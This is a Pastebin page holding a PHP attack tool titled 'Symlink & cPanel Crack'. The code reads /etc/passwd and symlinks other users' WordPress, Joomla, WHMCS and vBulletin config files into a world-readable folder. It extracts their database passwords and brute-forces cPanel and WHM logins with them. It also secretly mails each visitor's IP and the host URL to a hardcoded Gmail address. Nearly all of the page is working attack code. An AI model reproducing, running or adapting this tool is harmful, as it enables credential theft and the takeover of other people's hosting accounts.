API tools faq
paste
Advertisement
Guest User

cp peju

a guest
Oct 24th, 2018
196
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.95 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. $head = '
  3. <html>
  4. <head>
  5. </script>
  6. <title>Symlink & cPanel Crack</title>
  7. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  8.  
  9. <STYLE>
  10. body {
  11. font-family: courier new
  12. }
  13. tr {
  14. BORDER: dashed 1px #333;
  15. color: #FFF;
  16. }
  17. td {
  18. BORDER: dashed 1px #333;
  19. color: #FFF;
  20. }
  21. .table1 {
  22. BORDER: 0px Black;
  23. BACKGROUND-COLOR: Black;
  24. color: #FFF;
  25. }
  26. .td1 {
  27. BORDER: 0px;
  28. BORDER-COLOR: #333333;
  29. font: 7pt Verdana;
  30. color: Green;
  31. }
  32. .tr1 {
  33. BORDER: 0px;
  34. BORDER-COLOR: #333333;
  35. color: #FFF;
  36. }
  37. table {
  38. BORDER: dashed 1px #333;
  39. BORDER-COLOR: #333333;
  40. BACKGROUND-COLOR: Black;
  41. color: #FFF;
  42. }
  43. input {
  44. border : solid 3px ;
  45. border-color : #333;
  46. BACKGROUND-COLOR: white;
  47. font: 11pt Verdana;
  48. color: #333;
  49. }
  50. select {
  51. BORDER-RIGHT: Black 1px solid;
  52. BORDER-TOP: #DF0000 1px solid;
  53. BORDER-LEFT: #DF0000 1px solid;
  54. BORDER-BOTTOM: Black 1px solid;
  55. BORDER-color: #FFF;
  56. BACKGROUND-COLOR: Black;
  57. font: 8pt Verdana;
  58. color: Red;
  59. }
  60. submit {
  61. BORDER: buttonhighlight 2px outset;
  62. BACKGROUND-COLOR: Black;
  63. width: 30%;
  64. color: #FFF;
  65. }
  66. textarea {
  67. border : dashed 1px #333;
  68. BACKGROUND-COLOR: Black;
  69. font: Fixedsys bold;
  70. color: #999;
  71. }
  72. BODY {
  73. SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
  74. margin: 1px;
  75. color: Red;
  76. background-color: Black;
  77. }
  78. .main {
  79. margin : -287px 0px 0px -490px;
  80. BORDER: dashed 1px #333;
  81. BORDER-COLOR: #333333;
  82. }
  83. .tt {
  84. background-color: Black;
  85. }
  86.  
  87. A:link {
  88. COLOR: White; TEXT-DECORATION: none
  89. }
  90. A:visited {
  91. COLOR: White; TEXT-DECORATION: none
  92. }
  93. A:hover {
  94. color: Red; TEXT-DECORATION: none
  95. }
  96. A:active {
  97. color: Red; TEXT-DECORATION: none
  98. }
  99. </STYLE>
  100. <script language=\'javascript\'>
  101. function hide_div(id)
  102. {
  103. document.getElementById(id).style.display = \'none\';
  104. document.cookie=id+\'=0;\';
  105. }
  106. function show_div(id)
  107. {
  108. document.getElementById(id).style.display = \'block\';
  109. document.cookie=id+\'=1;\';
  110. }
  111. function change_divst(id)
  112. {
  113. if (document.getElementById(id).style.display == \'none\')
  114. show_div(id);
  115. else
  116. hide_div(id);
  117. }
  118. </script>'; ?>
  119. <html>
  120. <head>
  121. <?php
  122. $ip = getenv("REMOTE_ADDR");
  123. $ken = rand(1, 99999);
  124. $subj98 = " Result cpanel bouz |$ken";
  125. $email = "arfarf1337@gmail.com";
  126. $from = "From: cpanel@gmail.com";
  127. $tot = $_SERVER['REQUEST_URI'];
  128. $kon = $_SERVER['HTTP_HOST'];
  129. $tol = $ip . "";
  130. $msg8873 = "$tot $kon $tol";
  131. mail($email, $subj98, $msg8873, $from);
  132. ?>
  133. <?php
  134. echo $head ;
  135. echo '
  136.  
  137. <table width="100%" cellspacing="0" cellpadding="0" class="tb1" >
  138.  
  139.  
  140.  
  141. <td width="100%" align=center valign="top" rowspan="1"><font color=Red size=5 face="courier new"><b>cPanel & Symlink</font><br>
  142. <font color=red size=5 face="courier new"><b> Symlink Based</font><font color=white size=5 face="courier new"><b> Recoded By</font><font color=red size=5 face="courier new"><b> ./PejuangRoso </font> <div class="hedr">
  143. ';
  144.  
  145. ?>
  146. <body bgcolor=black><h3 style="text-align:center"><font color=red size=2 face="courier new">
  147. <form method=post>
  148. <input type=submit name=ini value="Generate PHP.ini" /></form>
  149. <?php
  150. if(isset($_POST['ini']))
  151. {
  152.  
  153. $r=fopen('php.ini','w');
  154. $rr=" disable_functions=none ";
  155. fwrite($r,$rr);
  156. $link="<a href=php.ini><font color=white size=2 face=\"comic sans ms\"><u>open this link in new tab to run PHP.INI</u></font></a>";
  157. echo $link;
  158.  
  159. }
  160. ?>
  161. <p>
  162. <?php
  163. //////////////////////////////////////
  164. ///// mass symlink ////////
  165. //////////////////////////////////////
  166. ?>
  167. <form method=post>
  168. <input type=submit name="usre" value="click to Extract username and password" /></form>
  169.  
  170.  
  171.  
  172.  
  173. <?php
  174. if(isset($_POST['usre'])){
  175. ?><form method=post>
  176. <textarea rows=10 cols=30 name=user><?php $users=file("/etc/passwd");
  177. foreach($users as $user)
  178. {
  179. $str=explode(":",$user);
  180. echo $str[0]."\n";
  181. }
  182.  
  183. ?></textarea><br><br>
  184. <input type=submit name=su value="bhaiyu ^_^ .. lets start" /></form>
  185. <?php } ?>
  186. <?php
  187. error_reporting(0);
  188. echo "<font color=red size=2 face=\"comic sans ms\">";
  189. if(isset($_POST['su']))
  190. {
  191.  
  192. $dir=mkdir('IcA',0777);
  193. $r = " Options all \n DirectoryIndex ICA.html \n Require None \n Satisfy Any";
  194. $f = fopen('IcA/.htaccess','w');
  195.  
  196. fwrite($f,$r);
  197. $consym="<a href=IcA/><font color=white size=3 face=\"comic sans ms\">configuration files</font></a>";
  198. echo "<br>folder where config files has been symlinked<br><u><font color=red size=2 face=\"comic sans ms\">$consym</font></u>";
  199.  
  200. $usr=explode("\n",$_POST['user']);
  201.  
  202. foreach($usr as $uss )
  203. {
  204. $us=trim($uss);
  205.  
  206. $r="IcA/";
  207. symlink('/home/'.$us.'/public_html/wp-config.php',$r.$us.'..wp-config');
  208. symlink('/home/'.$us.'/public_html/wordpress/wp-config.php',$r.$us.'..word-wp');
  209. symlink('/home/'.$us.'/public_html/blog/wp-config.php',$r.$us.'..wpblog');
  210. symlink('/home/'.$us.'/public_html/configuration.php',$r.$us.'..joomla-or-whmcs');
  211. symlink('/home/'.$us.'/public_html/joomla/configuration.php',$r.$us.'..joomla');
  212. symlink('/home/'.$us.'/public_html/vb/includes/config.php',$r.$us.'..vbinc');
  213. symlink('/home/'.$us.'/public_html/includes/config.php',$r.$us.'..vb');
  214. symlink('/home/'.$us.'/public_html/conf_global.php',$r.$us.'..conf_global');
  215. symlink('/home/'.$us.'/public_html/inc/config.php',$r.$us.'..inc');
  216. symlink('/home/'.$us.'/public_html/config.php',$r.$us.'..config');
  217. symlink('/home/'.$us.'/public_html/Settings.php',$r.$us.'..Settings');
  218. symlink('/home/'.$us.'/public_html/sites/default/settings.php',$r.$us.'..sites');
  219. symlink('/home/'.$us.'/public_html/whm/configuration.php',$r.$us.'..whm');
  220. symlink('/home/'.$us.'/public_html/whmcs/configuration.php',$r.$us.'..whmcs');
  221. symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..supporwhmcs');
  222. symlink('/home/'.$us.'/public_html/whmc/WHM/configuration.php',$r.$us.'..WHM');
  223. symlink('/home/'.$us.'/public_html/whm/WHMCS/configuration.php',$r.$us.'..whmc');
  224. symlink('/home/'.$us.'/public_html/whm/whmcs/configuration.php',$r.$us.'..WHMcs');
  225. symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..whmcsupp');
  226. symlink('/home/'.$us.'/public_html/clients/configuration.php',$r.$us.'..whmcs-cli');
  227. symlink('/home/'.$us.'/public_html/client/configuration.php',$r.$us.'..whmcs-cl');
  228. symlink('/home/'.$us.'/public_html/clientes/configuration.php',$r.$us.'..whmcs-CL');
  229. symlink('/home/'.$us.'/public_html/cliente/configuration.php',$r.$us.'..whmcs-Cl');
  230. symlink('/home/'.$us.'/public_html/clientsupport/configuration.php',$r.$us.'..whmcs-csup');
  231. symlink('/home/'.$us.'/public_html/billing/configuration.php',$r.$us.'..whmcs-bill');
  232. symlink('/home/'.$us.'/public_html/admin/config.php',$r.$us.'..admin-conf');
  233. }
  234. }
  235. ?>
  236. <?php
  237. //////////////////////////////////////
  238. /////password grabbing section////////
  239. //////////////////////////////////////
  240. ?>
  241.  
  242.  
  243.  
  244. <form method=post>
  245. <input type=submit name=sm value="start grabbing passwords from configuration files"></form>
  246. <?php
  247. error_reporting(0);
  248. set_time_limit(0);
  249. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
  250. {
  251.  
  252. $ar0=explode($marqueurDebutLien, $text);
  253. $ar1=explode($marqueurFinLien, $ar0[1]);
  254. $ar=trim($ar1[0]);
  255. return $ar;
  256. }
  257.  
  258. if(isset($_POST['sm']))
  259.  
  260. {
  261. echo "bhai ji ... have a cup of tea.. tab tak main is server ki jaan nikalta hoon :P";
  262. $ffile=fopen('r.txt','a+');
  263.  
  264.  
  265. $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/IcA/";
  266. $re=$r;
  267. $confi=array("..wp-config","..word-wp","..wpblog","..config","..admin-conf","..vb","..joomla-or-whmcs","..joomla","..vbinc","..whm","..whmcs","..supporwhmcs","..WHM","..whmc","..WHMcs","..whmcsupp","..whmcs-cli","..whmcs-cl","..whmcs-CL","..whmcs-Cl","..whmcs-csup","..whmcs-bill");
  268.  
  269. $users=file("/etc/passwd");
  270. foreach($users as $user)
  271. {
  272.  
  273. $str=explode(":",$user);
  274. $usersss=$str[0];
  275. foreach($confi as $co)
  276. {
  277.  
  278.  
  279. $uurl=$re.$usersss.$co;
  280. $uel=$uurl;
  281.  
  282. $ch = curl_init();
  283.  
  284. curl_setopt($ch, CURLOPT_URL, $uel);
  285. curl_setopt($ch, CURLOPT_HEADER, 1);
  286. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  287. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  288. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
  289. $result['EXE'] = curl_exec($ch);
  290. curl_close($ch);
  291. $uxl=$result['EXE'];
  292.  
  293.  
  294. if($uxl && preg_match('/table_prefix/i',$uxl))
  295. {
  296.  
  297. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website cms is wordpress </font></td></tr></table>";
  298.  
  299. echo $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
  300. if(!empty($dbp))
  301. $pass=$dbp."\n";
  302. fwrite($ffile,$pass);
  303.  
  304. }
  305. elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
  306. {
  307.  
  308. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website whmcs bhaiyu xD </font></td></tr></table>";
  309.  
  310. echo $dbp=entre2v2($uxl,"db_password = '","';");
  311. if(!empty($dbp))
  312. $pass=$dbp."\n";
  313. fwrite($ffile,$pass);
  314.  
  315. }
  316.  
  317.  
  318. elseif($uxl && preg_match('/dbprefix/i',$uxl))
  319. {
  320.  
  321. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website cms is joomla </font></td></tr></table>";
  322.  
  323. echo $db=entre2v2($uxl,"password = '","';");
  324. if(!empty($db))
  325. $pass=$db."\n";
  326. fwrite($ffile,$pass);
  327. }
  328. elseif($uxl && preg_match('/admincpdir/i',$uxl))
  329. {
  330.  
  331. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website cms is vbulletin </font></td></tr></table>";
  332.  
  333. echo $db=entre2v2($uxl,"password'] = '","';");
  334. if(!empty($db))
  335. $pass=$db."\n";
  336. fwrite($ffile,$pass);
  337.  
  338. }
  339. elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
  340. {
  341.  
  342. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> got config file for unknwon cms for user $usersss </font></td></tr></table>";
  343.  
  344. echo $db=entre2v2($uxl,"DB_PASSWORD', '","');");
  345. if(!empty($db))
  346. $pass=$db."\n";
  347. fwrite($ffile,$pass);
  348. }
  349. elseif($uxl && preg_match('/dbpass/i',$uxl))
  350. {
  351.  
  352. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's config file for unknwon cms </font></td></tr></table>";
  353.  
  354. echo $db=entre2v2($uxl,"dbpass = '","';");
  355. if(!empty($db))
  356. $pass=$db."\n";
  357. fwrite($ffile,$pass);
  358. }
  359. elseif($uxl && preg_match('/dbpass/i',$uxl))
  360. {
  361.  
  362. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> got config file for unknwon cms of user $usersss </font></td></tr></table>";
  363.  
  364. echo $db=entre2v2($uxl,"dbpass = '","';");
  365. if(!empty($db))
  366. $pass=$db."\n";
  367. fwrite($ffile,$pass);
  368.  
  369. }
  370. elseif($uxl && preg_match('/dbpass/i',$uxl))
  371. {
  372.  
  373. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's config file for unknwon cms </font></td></tr></table>";
  374.  
  375. echo $db=entre2v2($uxl,"dbpass = \"","\";");
  376. if(!empty($db))
  377. $pass=$db."\n";
  378. fwrite($ffile,$pass);
  379. }
  380.  
  381.  
  382. }
  383. }
  384. }
  385. ?>
  386. <?php
  387. /////////////////////////////////
  388. ///// cpanel cracker ///////
  389. /////////////////////////////////
  390. ?>
  391.  
  392.  
  393. <form method=post>
  394. <input type=submit name=cpanel value="Auto username/password loading cpanel cracker"><p>
  395. <?php
  396.  
  397. if(isset($_POST['cpanel']))
  398. {
  399. ?>
  400. <form method=post><div align=center><table>
  401. want to brute=><select name="op"> <option name="op" value="cp">CPanel</option>
  402. <option name="op" value="whm">WHMPanel</option></table><p>
  403. <textarea style="background:black;color:white" rows=20 cols=25 name=usernames ><?php $users=file("/etc/passwd");
  404. foreach($users as $user)
  405. {
  406. $str=explode(":",$user);
  407. echo $str[0]."\n";
  408. }
  409.  
  410. ?></textarea><textarea style="background:black;color:white" rows=20 cols=25 name=passwords >
  411. <?php
  412.  
  413. $d=getcwd()."/r.txt";
  414. $pf=file($d);
  415. foreach($pf as $rt)
  416. {
  417. $str=explode('\n',$rt);
  418. echo trim($str[0])."\n";
  419. } ?></textarea><p>
  420. <input type=submit name=cpanelcracking value="kerde khaat khadi >.<"></form>
  421. <?php
  422. }
  423. ?>
  424.  
  425.  
  426.  
  427.  
  428. <?php
  429. error_reporting(0);
  430. $connect_timeout=5;
  431. set_time_limit(0);
  432.  
  433. $userl=$_POST['usernames'];
  434. $passl=$_POST['passwords'];
  435. $attack=$_POST['op'];
  436. $target = "localhost";
  437.  
  438. if(isset($_POST['cpanelcracking']))
  439. {
  440. if($userl!=="" && $passl!=="")
  441. {
  442. if($_POST["op"]=="cp")
  443. {
  444. $cracked=$_POST['crack'];
  445. @fopen($cracked,'a');
  446. echo "bhai ji ^_^ ......now we are attacking cpanels....please wait till the end of process \n";
  447.  
  448.  
  449. }
  450. elseif($_POST["op"]=="whm")
  451. {
  452. @fopen($cracked,'a');
  453. echo "bhai ji ^_^ ......now we are attacking WHM panel....please wait till the end of process";
  454.  
  455. }
  456.  
  457. function cpanel($host,$user,$pass,$timeout){
  458. $ch = curl_init();
  459. curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
  460. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  461. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  462. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  463. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  464. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  465. $data = curl_exec($ch);
  466. if ( curl_errno($ch) == 0 ){
  467. echo "<table width=100% ><tr><td align=center><b><font color=white size=2>==================================</font><font color=red size=2> $user </font><font color=white size=2>cracked with </font><font color=red size=2> $pass </font> <font color=white size=2>==================================</font></b></td></tr></table>";
  468.  
  469.  
  470. }
  471.  
  472. curl_close($ch);}
  473.  
  474. $userlist=explode("\n",$userl);
  475. $passlist=explode("\n",$passl);
  476.  
  477. if ($attack == "cp")
  478. {
  479. foreach ($userlist as $user) {
  480. echo "<div align=center><table width=80% ><tr><td align=center><b><font color=red size=1>Attacking user $user </font></td></tr></table>";
  481. $finaluser = trim($user);
  482. foreach ($passlist as $password ) {
  483. $finalpass = trim($password);
  484.  
  485.  
  486. cpanel($target,$finaluser,$finalpass,$connect_timeout);
  487.  
  488. }
  489. }
  490.  
  491. }
  492.  
  493. function whm($host,$user,$pass,$timeout){
  494. $ch = curl_init();
  495. curl_setopt($ch, CURLOPT_URL, "http://$host:2086");
  496. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  497. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  498. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  499. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  500. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  501. $data = curl_exec($ch);
  502. if ( curl_errno($ch) == 0 ){
  503. echo "<table width=100% ><tr><td align=center><b><font color=white size=2>==================================</font><font color=red size=2> $user </font><font color=white size=2>cracked with </font><font color=red size=2> $pass </font> <font color=white size=2>==================================</font></b></td></tr></table>";
  504.  
  505.  
  506.  
  507.  
  508. }
  509.  
  510.  
  511. curl_close($ch);}
  512. $userlist=explode("\n",$userl);
  513. $passlist=explode("\n",$passl);
  514.  
  515. if ($attack == "whm")
  516. {
  517. foreach ($userlist as $user) {
  518. echo "<table width=80% ><tr><td align=center><b><font color=white size=2>user under attack is $user </font></td></tr></table>";
  519. $finaluser = trim($user);
  520. foreach ($passlist as $password ) {
  521. $finalpass = trim($password);
  522.  
  523. whm($target,$finaluser,$finalpass,$connect_timeout);
  524. }
  525. }
  526. }
  527. }
  528. elseif($userl=="")
  529. {
  530. echo "what are you doing bhai ji :( , you have left userlist field empty";
  531.  
  532. }
  533. elseif($passl=="")
  534. {
  535.  
  536. echo "bhai ji :( ... please put passwords in paasword list field";
  537. }
  538. }
  539. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!